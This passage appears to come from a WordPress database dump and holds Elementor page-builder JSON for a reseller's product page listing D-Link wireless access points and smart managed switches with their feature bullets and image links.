]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7417,3388,'_elementor_version','2.5.14'),(7418,3388,'_elementor_edit_mode','builder'),(7421,3389,'_wp_page_template','template-fullwidth.php'),(7422,3389,'_elementor_template_type','post'),(7423,3389,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"300\",\"right\":\"300\",\"bottom\":\"300\",\"left\":\"300\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet 